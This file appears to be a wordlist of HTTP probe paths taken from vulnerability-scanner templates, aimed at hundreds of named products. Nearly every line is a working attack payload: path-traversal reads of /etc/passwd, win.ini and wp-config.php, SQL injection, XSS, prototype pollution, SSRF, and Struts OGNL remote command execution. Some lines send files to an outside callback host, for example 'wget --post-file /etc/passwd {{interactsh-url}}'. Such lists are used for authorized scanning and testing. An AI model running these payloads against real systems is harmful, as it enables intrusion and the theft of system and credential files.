/login.do?message={{num1}}*{{num2}}
/login/login.do?message={{num1}}*{{num2}}
/portal/attachment_clearTempFile.action?bean.RecId=1
/portal/attachment_getAttList.action?bean.RecId=1
/include/thumb.php?dir=http\..\admin\login\login_check.php
/install/
/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
/jshERP-boot/user/getAllList;.ico
/common/download/resource?resource=/profile/../../../../etc/passwd
/common/download/resource?resource=/profile/../../../../Windows/win.ini
/authenticationserverservlet
/get_dkey.php?user=admin
/e/ViewImg/index.html?url=javascript:alert(1)
/web/xml/webuser-auth.xml
/api/dp/rptsvcsyncpoint?ccid=1
/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename={{filename}}.txt
/webui/?g=sys_dia_data_down&file_name=../etc/passwd
/api/v1/user/save?ID=&Username={{user}}&Role=管理员&Enable=true
/Content/Plugins/uploader/FileChoose.html
/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search
/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search
/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/redirect.php?plugins[]=../../../../etc/passwd%00
/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
/adm/file.cgi?next_file=%2fetc%2fpasswd
/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd
/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}
/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd
/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00
/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/downlot.php?file=../../../../../../../../../../etc/passwd
/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00
/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd
/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../etc/passwd
/pandora_console/ajax.php?page=../../../../../../etc/passwd
/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
/document.php?modulepart=project&file=../../../../../../../etc/passwd
/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00
/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
/?q=node&destination=node
/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd
/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true
/wp-admin/tools.php?content=&wp-attachment-export-download=true
/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd
/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd
/login/../../../etc/passwd
/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)
/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/system/console?.css
/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd
/wp-content/plugins/wsecure/wsecure-config.php
/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test
/cgi-bin/;cat$IFS/etc/passwd
/servlets/FetchFile?fileName=../../../etc/passwd
/command/prima-factory.cgi
/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/resource/file%3a///etc/passwd/
/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
/%5C../ssl/yaws-key.pem
/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini
/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini
/poc.jsp/
/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..
/static/../../../a/../../../../etc/passwd
/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/.../.../.../.../.../.../.../.../.../windows/win.ini
/.../.../.../.../.../.../.../.../.../etc/passwd
/_next/../../../../../../../../../../etc/passwd
/.env
/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}
/passwordrecovered.cgi?id={{rand_base(5)}}
/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
/verify.php?id=1&confirm_hash=
/mantis/verify.php?id=1&confirm_hash=
/mantisBT/verify.php?id=1&confirm_hash=
/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/bugs/verify.php?confirm_hash=&id=1
/struts2-rest-showcase/orders/3
/orders/3
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}
/command.cgi?cat%20/etc/passwd
/...\...\...\...\...\...\...\...\...\windows\win.ini
/..../..../..../..../..../..../..../..../..../windows/win.ini
/....\....\....\....\....\....\....\....\....\windows\win.ini
/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23
/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23
/nagiosql/admin/menuaccess.php
/uir//etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
/jkstatus
/jkstatus;
/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/img.php?f=/./etc/./passwd
/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/index.php?op=fileviewer&file=/etc/passwd
/meta
/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/
/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/nuxeo/login.jsp/pwn${31333333330+7}.xhtml
/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../etc/passwd
/index.php?q=file:///etc/passwd
/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected
/imcat/root/tools/adbug/binfo.php?phpinfo1
/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd
/_next/../../../../../../../../../etc/passwd
/include/downmix.inc.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}
/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/api/filemanager?path=%2F..%2f..%2fContent
/debug/pprof/
/debug/pprof/goroutine?debug=1
/LetsEncrypt/Index?fileName=/etc/passwd
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php
/WealthT24/GetImage?docDownloadPath=/etc/passwd
/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini
/base_import/static/c:/windows/win.ini
/web/static/c:/windows/win.ini
/base/static/c:/windows/win.ini
/api/snapshots

/wp-login.php?SECUPRESSaction=confirmaction
/wp-content/plugins/insert-php/readme.txt
/catalog.php?filename=../../../../../../../../../etc/passwd
/action/usermanager.htm
/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b{{num1}}*{{num2}}%7d
/cgi-bin/config.exp
/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23
/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin
/api-third-party/download/extdisks../etc/passwd
/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd
/../../../../../../etc/passwd
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/node/1?_format=hal_json
/?c=../../../../../../etc/passwd%00
/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/../../../../../etc/passwd
/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html
/CDGServer3/ClientAjax
/.%00./.%00./etc/passwd
/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd
/ReportServer/Pages/ReportViewer.aspx
/MicroStrategyWS/happyaxis.jsp
/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php
/ucmdb-api/connect
/v2/api/product/manger/getInfo
/cgi-bin/ExportAllSettings.sh
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/files/ldap.debug.txt
/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
/wp-json/acf/v3/options/a?id=active&field=plugins
/analytics/saw.dll?bieehome&startPage=1
/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/../../../../../../../../../../../../windows/win.ini
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/wp-content/uploads/wp-file-manager-pro/fm_backup/
/../../../../../../../../windows/win.ini
/infusions/downloads/downloads.php?cat_id=${system(ls)}
/config/getuser?index=0
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/SearchSvc/CVSearchService.svc
/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd
/wp-json/wp/v2/lesson/1
/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1
/pme/media/
/index.php?download=/etc/passwd
/api/settings/values
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/wp-content/plugins/easy-wp-smtp/
/wp-content/plugins/wp-mail-smtp-pro/
/searchblox/servlet/FileServlet?col=9&url=/etc/passwd
/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/wp-admin/index.php?download-lp-users=yes
/os/mxperson
/meaweb/os/mxperson
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
/metrics/v1/mbeans
?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/index.php?page_slug=../../../../../etc/passwd%00
/css/eonweb.css
/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
/version.web
/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2
/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4
/getcfg.php
/settings.php
/graphql
/index.jsp
/?__proto__%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&__proto__%5Bjquery%5D=x
/?constructor%5Bprototype%5D%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&constructor%5Bprototype%5D%5Bjquery%5D=x
/cache/backup/
/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything
/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything
/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd
/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini
/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})
/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(
/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv
/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image
/wp-admin/admin-ajax.php
/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd
/docpicker/internal_proxy/http/oast.me
/wps/PA_WCM_Authoring_UI/proxy/http/oast.me
/agc/vicidial_mysqli_errors.txt
/password.html
/openam/ui/PWResetUserValidation
/OpenAM-11.0.0/ui/PWResetUserValidation
/ui/PWResetUserValidation
/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st
/index.asp
/../conf/config.properties
/AvalancheWeb/image?imageFilePath=C:/windows/win.ini
/pentaho/api/userrolelist/systemRoles?require-cfg.js
/api/userrolelist/systemRoles?require-cfg.js
/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500
/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//
/?layout=/etc/passwd
/js/log.js
/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/file?valore=../../../../../windows/win.ini
/jeecg-boot/actuator/httptrace/
/jeecg-boot/sys/user/querySysUser?username=admin
/home/download
/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel
/processexecution/DownloadExcelFile/Process_Report_Excel
/processexecution/DownloadExcelFile/Infrastructure_Report_Excel
/processexecution/DownloadExcelFile/Resolver_Report_Excel
/api/snapshots/:key
/dashboard/snapshot/:key
/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd
/download/index.php?file=../../../../../../../../../etc/passwd
/conf/nginx.conf
/IND780/excalweb.dll?webpage=../../AutoCE.ini
/geoserver/
/files.md5
/testrail/files.md5
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/api/geojson?url=file:///etc/passwd
/api/geojson?url=file:///c://windows/win.ini
/.//WEB-INF/classes/META-INF/microprofile-config.properties
/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR
/action.php
/{{route}}
/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd
/asd/../../../../../../../../etc/passwd
/img/../../../../../../etc/passwd
/getCorsFile?urlPath=file:///etc/passwd
/getCorsFile?urlPath=file:///c://windows/win.ini
/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini
/public/plugins/alertlist/../../../../../conf/defaults.ini
/file/../../../../../../../../../../../../../../../../../..{{path}}
/;/WEB-INF/web.xml
/resin-doc/;/WEB-INF/resin-web.xml
/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0
/live_mfg.html
/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
